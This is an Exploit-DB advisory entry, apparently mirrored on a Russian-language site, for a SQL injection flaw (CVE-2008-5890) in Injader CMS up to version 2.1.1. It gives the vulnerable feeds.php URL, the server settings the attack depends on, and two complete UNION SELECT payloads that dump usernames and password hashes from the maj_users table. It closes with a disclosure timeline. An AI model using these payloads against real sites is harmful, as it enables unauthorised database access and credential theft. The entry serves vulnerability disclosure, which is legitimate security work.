- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7517
- Проверка EDB
-
- Пройдено
- Автор
- FUZION
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5890
- Дата публикации
- 2008-12-18
Код:
Injader CMS
http://www.injader.com/
- (= 2.1.1 -
- SQL -
http://localhost/upload/feeds.php?name=articles&id=<SQL>
magic_quotes_gpc = Off
register_globals = On
Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-18]- Источник
- www.exploit-db.com
